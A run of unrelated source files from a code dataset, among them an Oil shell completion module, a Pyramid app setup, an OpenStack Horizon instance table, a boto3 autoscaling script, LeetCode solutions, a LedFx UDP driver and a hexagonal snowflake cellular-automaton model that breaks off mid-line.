dynamic_opts = {}\n self.comp_state.dynamic_opts = dynamic_opts\n self.comp_state.currently_completing = True\n try:\n done = False\n while not done:\n try:\n for entry in self._PostProcess(base_opts, dynamic_opts, user_spec, comp):\n yield entry\n except _RetryCompletion as e:\n debug_f.log('Got 124, trying again ...')\n\n n = len(partial_argv)\n # Get another user_spec. The ShellFuncAction may have 'sourced' code\n # and run 'complete' to mutate comp_lookup, and we want to get that\n # new entry.\n if n == 0:\n raise AssertionError\n elif n == 1:\n # First\n base_opts, user_spec = self.comp_lookup.GetFirstSpec()\n else:\n base_opts, user_spec = self.comp_lookup.GetSpecForName(\n partial_argv[0])\n else:\n done = True # exhausted candidates without getting a retry\n finally:\n self.comp_state.currently_completing = False\n\n def _PostProcess(self, base_opts, dynamic_opts, user_spec, comp):\n \"\"\"\n Add trailing spaces / slashes to completion candidates, and time them.\n\n NOTE: This post-processing MUST go here, and not in UserSpec, because it's\n in READLINE in bash. compgen doesn't see it.\n \"\"\"\n self.progress_f.Write('Completing %r ... (Ctrl-C to cancel)', comp.line)\n start_time = time.time()\n\n # TODO: dedupe candidates? You can get two 'echo' in bash, which is dumb.\n\n i = 0\n for m, is_fs_action in user_spec.Matches(comp):\n\n # - Do shell QUOTING here. Not just for filenames, but for everything!\n # User-defined functions can't emit $var, only \\$var\n # Problem: COMP_WORDBREAKS messes things up! How can I account for that?\n # '_tmp/spam\\ '\n # it stops at the first ' ' char.\n #\n # I guess you can add a COMP_WORDBREAKS suffix?\n # Or should you get rid of completion_delims altogether?\n # Then you would be constantly completing the beginning of the line?\n # TODO: write a terminal program to show that\n\n #m = util.BackslashEscape(m, SHELL_META_CHARS)\n #self.debug_f.log('after shell escaping: %s', m)\n\n # SUBTLE: dynamic_opts is part of comp_state, which ShellFuncAction can\n # mutate! So we don't want to pull this out of the loop.\n opt_filenames = False\n if 'filenames' in dynamic_opts:\n opt_filenames = dynamic_opts['filenames']\n if 'filenames' in base_opts:\n opt_filenames = base_opts['filenames']\n\n # compopt -o filenames is for user-defined actions. Or any\n # FileSystemAction needs it.\n if is_fs_action or opt_filenames:\n if os_path.isdir(m): # TODO: test coverage\n yield m + '/'\n continue\n\n opt_nospace = False\n if 'nospace' in dynamic_opts:\n opt_nospace = dynamic_opts['nospace']\n if 'nospace' in base_opts:\n opt_nospace = base_opts['nospace']\n\n if opt_nospace:\n yield m\n else:\n yield m + ' '\n\n # NOTE: Can't use %.2f in production build!\n i += 1\n elapsed_ms = (time.time() - start_time) * 1000.0\n plural = '' if i == 1 else 'es'\n self.progress_f.Write(\n '... %d match%s for %r in %d ms (Ctrl-C to cancel)', i,\n plural, comp.line, elapsed_ms)\n\n elapsed_ms = (time.time() - start_time) * 1000.0\n plural = '' if i == 1 else 'es'\n self.progress_f.Write(\n 'Found %d match%s for %r in %d ms', i,\n plural, comp.line, elapsed_ms)\n\n \nclass ReadlineCallback(object):\n \"\"\"A callable we pass to the readline module.\"\"\"\n\n def __init__(self, readline_mod, root_comp, debug_f):\n self.readline_mod = readline_mod\n self.root_comp = root_comp\n self.debug_f = debug_f\n\n self.comp_iter = None # current completion being processed\n\n def _GetNextCompletion(self, state):\n if state == 0:\n # TODO: Tokenize it according to our language. If this is $PS2, we also\n # need previous lines! Could make a VirtualLineReader instead of\n # StringLineReader?\n buf = self.readline_mod.get_line_buffer()\n\n # Readline parses \"words\" using characters provided by\n # set_completer_delims().\n # We have our own notion of words. So let's call this a 'rl_slice'.\n begin = self.readline_mod.get_begidx()\n end = self.readline_mod.get_endidx()\n\n comp = Api(line=buf, begin=begin, end=end)\n\n self.comp_iter = self.root_comp.Matches(comp)\n\n assert self.comp_iter is not None, self.comp_iter\n\n try:\n next_completion = self.comp_iter.next()\n except StopIteration:\n next_completion = None # signals the end\n\n return next_completion\n\n def __call__(self, unused_word, state):\n \"\"\"Return a single match.\"\"\"\n try:\n return self._GetNextCompletion(state)\n except util.FatalRuntimeError as e:\n # From -W. TODO: -F is swallowed now.\n # We should have a nicer UI for displaying errors. Maybe they shouldn't\n # print it to stderr. That messes up the completion display. We could\n # print what WOULD have been COMPREPLY here.\n log('Runtime error while completing: %s', e)\n self.debug_f.log('Runtime error while completing: %s', e)\n except Exception as e: # ESSENTIAL because readline swallows exceptions.\n import traceback\n traceback.print_exc()\n log('Unhandled exception while completing: %s', e)\n self.debug_f.log('Unhandled exception while completing: %s', e)\n except SystemExit as e:\n # Because readline ignores SystemExit!\n posix._exit(e.code)\n\n\nif __name__ == '__main__':\n # This does basic filename copmletion\n import readline\n readline.parse_and_bind('tab: complete')\n while True:\n x = raw_input('$ ')\n print(x)\n","sub_path":"core/completion.py","file_name":"completion.py","file_ext":"py","file_size_in_byte":32209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"164158386","text":"from pyramid.config import Configurator\n\nfrom pyramid.renderers import JSON\n\n# Following references needed for Sqlite creation\nfrom PythonMaps2.data.PythonMaps.TSData import TSData\nfrom PythonMaps2.data.PythonMaps.HUCs import HUCs\nfrom PythonMaps2.data.PythonMaps.stations import Stations\nfrom PythonMaps2.data.PythonMaps.db_factory import DbSessionFactory\n# from PythonMaps1.data.repository import Repository\n\ndef main(global_config, **settings):\n \"\"\" This function returns a Pyramid WSGI application.\n \"\"\"\n with Configurator(settings=settings) as config:\n config.include('pyramid_chameleon')\n init_db(config)\n config.include('.routes')\n\n configure_renderers( config )\n\n config.add_static_view( 'shapes', 'static/shapes' )\n config.add_route( 'stations_api', '/api/stations' )\n config.add_route( 'stations1_api', '/api/usgs_stations' )\n config.add_route( 'stations2_api', '/api/load_stations' )\n config.add_route( 'stations3_api', '/api/stations_by_huc' )\n config.add_route( 'usgs_api', '/api/usgs' ) # TS by huc\n config.add_route( 'usgs2_api', '/api/usgs2' ) # TS by station\n config.add_route( 'usgs4_api', '/api/usgs4' ) # TS Validate\n config.add_route( 'usgs1_api', '/api/usgs1/{guid_id}' )\n config.add_route( 'usgs3_api', '/api/usgs' ) # unknown\n\n config.add_route( 'hucs_api', '/api/hucs' )\n config.add_route( 'hucs1_api', '/api/load_hucs' )\n # config.add_route( 'station_data_api', '/api/station_data' )\n # config.add_route( 'timeseries_data_api', '/api/timeseries_data' )\n config.scan()\n return config.make_wsgi_app()\n\n\n\ndef init_db(config):\n settings = config.get_settings()\n db_file = settings.get('db_filename')\n\n DbSessionFactory.global_init(db_file)\n\n # database_ini = settings.get('database_ini')\n # DbSessionFactory.global_init(database_ini)\n\ndef configure_renderers(config):\n json_renderer = JSON(indent=4)\n json_renderer.add_adapter(TSData, lambda c, _: c.to_dict())\n json_renderer.add_adapter(HUCs, lambda p, _: p.to_dict() )\n json_renderer.add_adapter( Stations, lambda p, _: p.to_dict() )\n config.add_renderer('json', json_renderer)","sub_path":"PythonMaps2/PythonMaps2/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"122145288","text":"\"\"\" Contains shared errors types that can be raised from API functions \"\"\"\n\n\nclass UnexpectedStatus(Exception):\n \"\"\"Raised by api functions when the response status an undocumented status and Client.raise_on_unexpected_status is True\"\"\"\n\n def __init__(self, status_code: int, content: bytes):\n self.status_code = status_code\n self.content = content\n\n super().__init__(f\"Unexpected status code: {status_code}\")\n\n\n__all__ = [\"UnexpectedStatus\"]\n","sub_path":"clients/tabby-python-client/tabby_client/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"435332910","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright 2012 OpenStack Foundation\n# Copyright 2012 Nebula, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\nimport logging\n\nfrom django import template\nfrom django.template.defaultfilters import title # noqa\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom horizon import tables\nfrom horizon.utils import filters\n\nfrom openstack_dashboard import api\nfrom openstack_dashboard.dashboards.compute.instances \\\n import tables as compute_tables\nfrom openstack_dashboard.dashboards.admin.instances \\\n import tables as admin_tables\nfrom openstack_dashboard.utils import filters as global_filters\n\nLOG = logging.getLogger(__name__)\n\n\nclass ClusterAdminTerminateInstance(compute_tables.TerminateInstance):\n redirect_url = 'horizon:cluster_admin:instances:index'\n\n\nclass AdminEditInstance(admin_tables.AdminEditInstance):\n url = \"horizon:cluster_admin:instances:update\"\n\n\nclass MigrateInstance(tables.BatchAction):\n name = \"migrate\"\n action_present = _(\"Migrate\")\n action_past = _(\"Scheduled migration (pending confirmation) of\")\n data_type_singular = _(\"Instance\")\n data_type_plural = _(\"Instances\")\n classes = (\"btn-migrate\", \"btn-danger\")\n policy_rules = ((\"compute\", \"compute_extension:admin_actions:migrate\"),)\n\n def get_policy_target(self, request, datum=None):\n project_id = None\n if datum:\n project_id = getattr(datum, 'tenant_id', None)\n return {\"project_id\": project_id}\n\n def allowed(self, request, instance):\n allowed_status = (compute_tables.ACTIVE_STATES +\n compute_tables.ARREAR_STATES)\n return ((instance.status in allowed_status\n or instance.status == 'SHUTOFF')\n and not compute_tables.is_deleting(instance))\n\n def action(self, request, obj_id):\n api.nova.server_migrate(request, obj_id)\n\n\nclass LiveMigrateInstance(tables.LinkAction):\n name = \"live_migrate\"\n verbose_name = _(\"Live Migrate Instance\")\n url = \"horizon:cluster_admin:instances:live_migrate\"\n classes = (\"ajax-modal\", \"btn-migrate\", \"btn-danger\")\n policy_rules = (\n (\"compute\", \"compute_extension:admin_actions:migrateLive\"),)\n\n def get_policy_target(self, request, datum=None):\n project_id = None\n if datum:\n project_id = getattr(datum, 'tenant_id', None)\n return {\"project_id\": project_id}\n\n def allowed(self, request, instance):\n task_state = getattr(instance, \"OS-EXT-STS:task_state\")\n allowed_status = (compute_tables.ACTIVE_STATES +\n compute_tables.ARREAR_STATES)\n return ((instance.status in allowed_status)\n and not compute_tables.is_deleting(instance)\n and task_state is None)\n\n\nclass AdminUpdateRow(tables.Row):\n ajax = True\n\n def get_data(self, request, instance_id):\n instance = api.nova.server_get(request, instance_id,\n required_admin=True)\n tenant = api.keystone.tenant_get(request,\n instance.tenant_id,\n admin=True)\n instance.full_flavor = api.nova.flavor_get(request,\n instance.flavor[\"id\"])\n instance.tenant_name = getattr(tenant, \"name\", None)\n\n # collect all floating ips\n ip_id_dic = {}\n floating_ip_list = api.neutron.FloatingIpManager(\n request, require_admin=True).list_all_fips()\n\n for floating_ip in floating_ip_list:\n if not floating_ip.instance_id:\n continue\n if floating_ip.instance_id not in ip_id_dic.keys():\n ip_id_dic[floating_ip.instance_id] = {}\n ip_id_dic[floating_ip.instance_id][floating_ip.id] = \\\n floating_ip.floating_ip_address\n if instance.id in ip_id_dic:\n instance.fips = ip_id_dic[instance.id]\n return instance\n\n\nclass AdminInstanceFilterAction(global_filters.FilterAction):\n filter_choices = (('name', _(\"Name\")), ('project', _(\"Project ID\")),\n ('image', _(\"Image ID\")))\n\n\ndef get_intranet_ips(instance):\n if hasattr(instance, \"addresses\"):\n addresses = instance.addresses\n fixed_ips = []\n for key in addresses:\n network_list = addresses[key]\n for network in network_list:\n if network['OS-EXT-IPS:type'] != 'floating':\n new_addresses = key + \"/\" + network['addr']\n fixed_ips.append(new_addresses)\n if fixed_ips:\n template_name = 'compute/instances/_instance_ips.html'\n context = {\"ips\": fixed_ips}\n return template.loader.render_to_string(template_name, context)\n return \"-\"\n\n\ndef get_public_ip(instance):\n if hasattr(instance, \"fips\"):\n template_name = 'admin/instances/_instance_ips.html'\n context = {\"ips\": instance.fips}\n return template.loader.render_to_string(template_name, context)\n return \"-\"\n\n\nclass AdminInstancesTable(tables.DataTable):\n STATUS_CHOICES = (\n (\"active\", True),\n (\"shutoff\", True),\n (\"suspended\", True),\n (\"paused\", True),\n (\"in_arrear\", True),\n (\"error\", False),\n (_(\"Active\"), True),\n (_(\"Shutoff\"), True),\n (_(\"Suspended\"), True),\n (_(\"Paused\"), True),\n (_(\"In Arrear\"), True),\n (_(\"Error\"), False),\n )\n tenant = tables.Column(\"tenant_name\", verbose_name=_(\"Project\"))\n # NOTE(gabriel): Commenting out the user column because all we have\n # is an ID, and correlating that at production scale using our current\n # techniques isn't practical. It can be added back in when we have names\n # returned in a practical manner by the API.\n # user = tables.Column(\"user_id\", verbose_name=_(\"User\"))\n host = tables.Column(\"OS-EXT-SRV-ATTR:host\",\n verbose_name=_(\"Host\"),\n classes=('nowrap-col',))\n name = tables.Column(\"name\",\n link=(\"horizon:cluster_admin:instances:detail\"),\n verbose_name=_(\"Name\"))\n image_name = tables.Column(\"image_name\",\n verbose_name=_(\"Image Name\"))\n intranet_ip = tables.Column(get_intranet_ips,\n verbose_name=_(\"Private IP\"),\n attrs={'data-type': \"ip\"})\n public_ip = tables.Column(get_public_ip,\n verbose_name=_(\"Floating IPs\"),\n attrs={'data-type': \"public_ip\"})\n size = tables.Column(admin_tables.get_size,\n verbose_name=_(\"Size\"),\n classes=('nowrap-col',),\n attrs={'data-type': 'size'})\n\n status = tables.Column(compute_tables.get_state,\n verbose_name=_(\"Status\"),\n filters=(title, filters.replace_underscores),\n status=True,\n status_choices=STATUS_CHOICES,\n display_choices=compute_tables.STATUS_DISPLAY_CHOICES)\n\n created_time = tables.Column(compute_tables.get_created_time,\n verbose_name=_(\"Created Time\"),)\n\n class Meta:\n name = \"instances\"\n verbose_name = _(\"Instances\")\n status_columns = [\"status\"]\n table_actions = (AdminInstanceFilterAction,)\n row_class = AdminUpdateRow\n multi_select = False\n template = \"admin/instances/_data_table.html\"\n table_actions_template = \"admin/instances/admin_instance_action.html\"\n row_actions = (compute_tables.StartInstance,\n AdminEditInstance,\n compute_tables.ConsoleLink,\n compute_tables.TogglePause,\n compute_tables.ToggleSuspend,\n MigrateInstance,\n LiveMigrateInstance,\n compute_tables.SoftRebootInstance,\n compute_tables.RebootInstance,\n compute_tables.StopInstance,\n ClusterAdminTerminateInstance,)\n","sub_path":"horizon/openstack_dashboard/dashboards/cluster_admin/instances/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":8766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"348118057","text":"import boto3\n\n#########List running ec2 instances with status#######\nec2 = boto3.resource('ec2')\ninstances = ec2.instances_filter(\n Filters=[{'Name': 'instance-state-name', 'Values': ['running']}]\n)\nfor instance in instances:\n print(instance.id, instance.state)\n\n#########Create launch configuration group#######\nasclient = boto3.client('autoscaling')\nres = asclient.create_launch_configuration(\n LaunchConfigurationName='mylc',\n ImageID='ami-08111162',\n KeyName='mywebkey',\n SecurityGroups=['nixsg'],\n InstanceType='t2.micro'\n)\nprint(res)\n\n#########Create auto-scaling group#######\nres1 = asclient.create_auto_scaling_group(\n AutoScalingGroupName='mygroup',\n LaunchConfigurationName='mylc',\n MinSize=1,\n MaxSize=2,\n DesiredCapacity=1,\n LoadBalancerNames=['nixlb'],\n AvailabilityZones=['us-east-1d', 'us-east-1b']\n)\nprint(res1)\n\n#########Update/Disable auto-scaling group#######\nres1 = asclient.update_auto_scaling_group(\n AutoScalingGroupName='mygroup',\n LaunchConfigurationName='mylc',\n MinSize=0,\n MaxSize=0,\n DesiredCapacity=0,\n AvailabilityZones=['us-east-1d', 'us-east-1b']\n)","sub_path":"BOTO-AWS/B3Src/B3ASG.py","file_name":"B3ASG.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"575038813","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 29 15:30:44 2018\n\n@author: owen\n\"\"\"\n\n# https://leetcode.com/problems/length-of-longest-fibonacci-subsequence/discuss/152343/C++JavaPython-Check-Pair\n#class Solution(object):\n# def lenLongestFibSubseq(self, A):\n# \"\"\"\n# :type A: List[int]\n# :rtype: int\n# \"\"\"\n# # Brute Force with Set, time O(n^2 log m), m is the max value in A, space O(n)\n# S=set(A) # use a Set structure to determine quickly whether the next term is in the array A or not. \n# res=0\n# n=len(A)\n# for i in range(n):\n# for j in range(i+1,n):\n# cnt=2\n# prev,curr=A[i],A[j] # For each starting pair A[i], A[j],\n# nxt=prev+curr # we maintain the next expected value A[i] + A[j]\n# while nxt in S:\n# prev,curr=curr,nxt # next exsits, then update\n# nxt=prev+curr\n# cnt+=1\n# if cnt>res:\n# res=cnt\n# return res if res>2 else 0 # subsequences are only fibonacci-like if they have length 3 or mor\n \n# https://leetcode.com/problems/length-of-longest-fibonacci-subsequence/solution/# \n#class Solution(object):\n# def lenLongestFibSubseq(self, A):\n# \"\"\"\n# :type A: List[int]\n# :rtype: int\n# \"\"\"\n# # 2d-DP, time O(n^2), space O(n^2)\n# dmap={x:i for i,x in enumerate(A)} \n# n=len(A)\n# res=0\n# dp=[[2]*n for __ in range(n)] # dp[j][k] be the longest path ending in [j, k].\n# for k in range(n):\n# for j in range(k):\n# i=dmap.get(A[k]-A[j], -1) # (i, j) and (j, k) are connected if and only if A[i] + A[j] == A[k]\n# if i!=-1 and i2 else 0\n\nimport collections\nclass Solution(object):\n def lenLongestFibSubseq(self, A):\n \"\"\"\n :type A: List[int]\n :rtype: int\n \"\"\"\n dp = collections.defaultdict(int) # dp[a, b] represents the length of fibo sequence ends up with (a, b)\n S = set(A)\n# res = 0\n for j in range(len(A)):\n for i in range(j):\n if A[j] - A[i] < A[i] and A[j] - A[i] in S:\n dp[A[i], A[j]] = dp.get((A[j] - A[i], A[i]), 2) + 1 # use two seq values as key\n #res = max(res, dp[A[i], A[j]])\n return max(dp.values() or [0])\n \nif __name__==\"__main__\":\n print(Solution().lenLongestFibSubseq([1,2,3,4,5,6,7,8]))\n print(Solution().lenLongestFibSubseq([1,3,7,11,12,14,18]))","sub_path":"873. Length of Longest Fibonacci Subsequence.py","file_name":"873. Length of Longest Fibonacci Subsequence.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"305424447","text":"def solve(*coefficients):\n if len(coefficients) == 3:\n a, b, c = int(coefficients[0]), int(coefficients[1]), int(coefficients[2])\n d = b ** 2 - 4 * a * c\n if d > 0:\n x1 = (-b + d ** 0.5) / (2 * a)\n x2 = (-b - d ** 0.5) / (2 * a)\n return x1, x2\n elif d == 0:\n x1 = (-b) / (2 * a)\n return x1\n elif d < 0:\n return 'NULL'\n elif len(coefficients) == 2:\n b, c = coefficients[0], coefficients[1]\n if b != 0:\n x = -c / b\n return x\n else:\n return 'NULL'\n elif len(coefficients) == 1:\n c = coefficients[0]\n if c == 0:\n return c\n else:\n return 'NULL'\n else:\n return 'None'\n\n\nprint(solve(*list(map(int, input().split(' ')))))\n","sub_path":"laba3/t22.5.py","file_name":"t22.5.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"290622484","text":"import logging\nimport socket\n\nimport numpy as np\nimport voluptuous as vol\n\nfrom ledfx.devices import Device\nfrom ledfx.utils import (\n resolve_destination,\n turn_wled_off,\n turn_wled_on,\n wled_identifier,\n wled_power_state,\n)\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass UDPDevice(Device):\n \"\"\"Generic UDP device support\"\"\"\n\n CONFIG_SCHEMA = vol.Schema(\n {\n vol.Required(\n \"ip_address\",\n description=\"Hostname or IP address of the device\",\n ): str,\n vol.Required(\n \"port\", description=\"Port for the UDP device\"\n ): vol.All(vol.Coerce(int), vol.Range(min=1, max=65535)),\n vol.Required(\n \"pixel_count\",\n description=\"Number of individual pixels\",\n ): vol.All(vol.Coerce(int), vol.Range(min=1)),\n vol.Optional(\n \"include_indexes\",\n description=\"Include the index for every LED\",\n default=False,\n ): bool,\n vol.Optional(\n \"data_prefix\",\n description=\"Data to be appended in hex format\",\n ): str,\n vol.Optional(\n \"data_postfix\",\n description=\"Data to be prepended in hex format\",\n ): str,\n }\n )\n\n def activate(self):\n self.WLEDReceiver = False\n self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n # check if ip/hostname resolves okay\n self.device_ip = resolve_destination(self._config[\"ip_address\"])\n\n if not self.device_ip:\n _LOGGER.warning(\n f\"Cannot resolve destination {self._config['ip_address']}, aborting device {self.name} activation. Make sure the IP/hostname is correct and device is online.\"\n )\n return\n # If the device is a WLED device, turn it on\n if wled_identifier(self.device_ip, self.name):\n self.WLEDReceiver = True\n self.wled_state = wled_power_state(self.device_ip, self.name)\n if self.wled_state is False:\n turn_wled_on(self.device_ip, self.name)\n super().activate()\n\n def deactivate(self):\n super().deactivate()\n if self.WLEDReceiver is True and self.wled_state is False:\n turn_wled_off(self.device_ip, self.name)\n self._sock = None\n\n @property\n def pixel_count(self):\n return int(self._config[\"pixel_count\"])\n\n def flush(self, data):\n udpData = bytearray()\n byteData = data.astype(np.dtype(\"B\"))\n\n # Append the prefix if provided\n prefix = self._config.get(\"data_prefix\")\n if prefix:\n try:\n udpData.extend(bytes.fromhex(prefix))\n except ValueError:\n _LOGGER.warning(f\"Cannot convert prefix {prefix} to hex value\")\n\n # Append all of the pixel data\n if self._config[\"include_indexes\"]:\n for i in range(len(byteData)):\n udpData.extend(bytes([i]))\n udpData.extend(byteData[i].flatten().tobytes())\n else:\n udpData.extend(byteData.flatten().tobytes())\n\n # Append the postfix if provided\n postfix = self._config.get(\"data_postfix\")\n if postfix:\n try:\n udpData.extend(bytes.fromhex(postfix))\n except ValueError:\n _LOGGER.warning(\n f\"Cannot convert postfix {postfix} to hex value\"\n )\n\n self._sock.sendto(\n bytes(udpData),\n (self.device_ip, self._config[\"port\"]),\n )\n","sub_path":"ledfx/devices/udp.py","file_name":"udp.py","file_ext":"py","file_size_in_byte":3651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"217917763","text":"import cmd, sys\nimport importlib\nimport threading\nimport apibot\nimport clibot\nimport config\n\ndef apibot_process():\n apibot.HoroBot().start()\n\nclass KenOokamiHoroBotShell(cmd.Cmd):\n intro = '@Ken_Ookami_Horo_bot and @Yoitsu_no_Kenro_Horo are here!\\nType \"help\" or \"?\" to get avaliable commands.\\n'\n prompt = '🍎 >>> '\n file = None\n\n def __init__(self):\n cmd.Cmd.__init__(self)\n self.apibot=threading.Thread(target=apibot_process)\n self.clibot=clibot.clibot\n\n\n # ----- basic turtle commands -----\n '''\n To create a command:\n def do_something(self, arg):\n ... # do something\n and you can use it by typing 'something ' in shell.\n You can also define a 'help_something' function to provide help information.\n '''\n def do_bye(self, arg):\n 'Are you ready to be eaten by me 😋 ~'\n print(\"\\n😋 >>>Nice to eat you~\")\n return True\n raise KeyboardInterrupt\n def do_clibot(self,arg):\n 'send command to clibot 😋\\nusage:clibot {command}'\n #print(\"DEBUG> [{}]({})\".format(arg,len(arg)))\n self.clibot.send_command(arg)\n \n def cmdloop(self):\n self.apibot.start()\n self.clibot.run()\n cmd.Cmd.cmdloop(self)\n\nif __name__ == '__main__':\n shell=KenOokamiHoroBotShell()\n try:\n shell.cmdloop()\n except KeyboardInterrupt:\n print(\"\\n😋 >>>Nice to eat you~\")\n exit(0)\n","sub_path":"shell.py","file_name":"shell.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"476514008","text":"# // Time Complexity : O(m*n^2) where m is the length of a word and \n# n is the number of words in the wordlist\n# // Space Complexity : O(m*n^2)\n# // Did this code successfully run on Leetcode : \n# // Any problem you faced while coding this : \n\n# // Your code here along with comments explaining your approach \nclass Solution:\n \n def get_adjacent_words(self,word):\n res = []\n for i in range(len(word)):\n s = word[:i] + '_' + word[i+1:]\n res.append(s)\n return res \n \n \n def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\n if endWord not in wordList or not wordList: return 0\n wordDict = defaultdict(list)\n \n for word in wordList:\n adj_words = self.get_adjacent_words(word)\n for each in adj_words:\n wordDict[each].append(word)\n \n # print(wordDict) \n \n # BFS routine\n \n queue = deque()\n queue.append((beginWord,1))\n visited = set()\n visited.add(beginWord)\n \n while queue:\n word,level = queue.popleft()\n if word == endWord: return level\n adj_words = self.get_adjacent_words(word)\n for each in adj_words:\n for list_words in wordDict[each]:\n if list_words not in visited:\n queue.append((list_words,level+1))\n visited.add(list_words)\n return 0\n ","sub_path":"len_word_ladder.py","file_name":"len_word_ladder.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"240694198","text":"import pandas as pd\nimport cudf as cudf\nimport blazingsql\n\ndef main():\n column_names = ['n_nationkey', 'n_name', 'n_regionkey', 'n_comments']\n column_types = {'n_nationkey': 'int32', 'n_regionkey': 'int64'}\n nation_df = pd.read_csv(\"data/nation.psv\", delimiter='|', dtype=column_types, names=column_names)\n nation_df = nation_df[['n_nationkey', 'n_regionkey']]\n\n nation_gdf = cudf.DataFrame.from_pandas(nation_df)\n print(nation_gdf)\n\n with blazingsql.open_connection('/tmp/orchestrator.socket') as connection:\n print(connection.accessToken)\n db = connection.Database('main')\n\n tableA = db.Table('nation', nation_gdf)\n token, unix_path = db.run_query('select id from main.nation', [tableA])\n with db.get_result(token, unix_path) as gdfB:\n print(gdfB)\n\nif __name__ == '__main__':\n main()\n","sub_path":"python/examples/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"36501107","text":"#coding:utf-8\nimport logging\nfrom datetime import datetime\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom apscheduler.jobstores.sqlalchemy import SQLAlchemyJobStore\nfrom apscheduler.executors.pool import ThreadPoolExecutor, ProcessPoolExecutor\nfrom message.models import Message\n\ntoday = datetime.now()\nlog = logging.getLogger('apscheduler.executors.default')\nfmt = logging.Formatter('%(levelname)s:%(name)s:%(message)s')\nh = logging.StreamHandler()\nh.setFormatter(fmt)\nlog.addHandler(h)\n\njobstores = {\n 'default': SQLAlchemyJobStore(url='sqlite:///scheduler.sqlite')\n}\nexecutors = {\n 'default': ThreadPoolExecutor(20),\n 'processpool': ProcessPoolExecutor(5)\n}\njob_defaults = {\n 'coalesce': False,\n 'max_instances': 3\n}\n\ndef create_message(list, title, content):\n\tfor i in list:\n\t\tMessage.objects.create(sender='admin', reciver=i, title=title, content=content)\n\n\nscheduler = BackgroundScheduler(jobstores=jobstores, executors=executors, job_defaults=job_defaults, timezone='Asia/Shanghai')","sub_path":"scheduler/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"154387792","text":"from hexagrid import *\nimport time\n\nclass Model():\n def __init__(self, alpha, beta, gamma, mapRadius):\n \"\"\"\n alpha : float (0 <= b <= 1) constante de diffusion\n beta : float (0 <= b <= 1) background vapor level\n gamma : float (0 <= b <= 1) Addition de vapeur\n Initialise le modèle\n \"\"\"\n assert 0 <= beta and beta <= 1, \"Le niveau de vapeur beta doit être compris entre 0 et 1\"\n assert 0 <= gamma and gamma <= 1, \"La constante d'addition de vapeur gamma doit être comprise entre 0 et 1\"\n assert 0 <= alpha and alpha <= 1, \"La constante de diffusion alpha doit être comprise entre 0 et 1\"\n assert mapRadius >= 0, \"Le rayon de la carte doit être positif\"\n\n self.alpha = alpha\n self.beta = beta\n self.gamma = gamma\n\n print(\"Model\", alpha, beta, gamma)\n\n self.hexaMap = HexaMap(mapRadius)\n\n self.step = 0\n\n def InitGrid(self):\n for cell in self.hexaMap.cells.values():\n q,r,s = cell.GetCoords()\n if q == r and r == 0:\n cell.SetState(1)\n else :\n cell.SetState(self.beta)\n self._CellsNewState()\n\n def UpdateGrid(self):\n old = time.time()\n self.step += 1\n\n rec = HexaMap(self.hexaMap.radius)\n nonRec = HexaMap(self.hexaMap.radius)\n\n for cell in self.hexaMap.cells.values():\n q,r,s = cell.GetCoords()\n receptive = self._Receptive(cell)\n #print(cell, receptive)\n if receptive:\n rec[(q,r)] = HexaCell(cell.q, cell.r, cell.state, cell.isEdge)\n nonRec[(q,r)] = HexaCell(cell.q, cell.r, 0, cell.isEdge)\n else :\n rec[(q,r)] = HexaCell(cell.q, cell.r, 0, cell.isEdge)\n nonRec[(q,r)] = HexaCell(cell.q, cell.r, cell.state, cell.isEdge)\n\n for cell in rec.cells.values():\n if cell.state != 0:\n cell.state += self.gamma\n\n for cell in nonRec.cells.values():\n cell.state = 1/2 * cell.state + 1/2 * self._GetNeighborsAverage(cell, nonRec)\n\n\n for qr in self.hexaMap.cells:\n recCell = rec[qr]\n nonRecCell = nonRec[qr]\n q,r = qr\n cell = HexaCell(q,r, nonRecCell.state + recCell.state, recCell.isEdge)\n self.hexaMap.cells[qr] = cell\n \n print(self.step, \":\", time.time() - old, \"s\")\n self._CellsNewState()\n\n def _CellsNewState(self):\n for cell in self.hexaMap.cells.values():\n cell.UpdateState()\n\n def _Receptive(self, hexaCell):\n q,r,s = hexaCell.GetCoords()\n hexaCell = 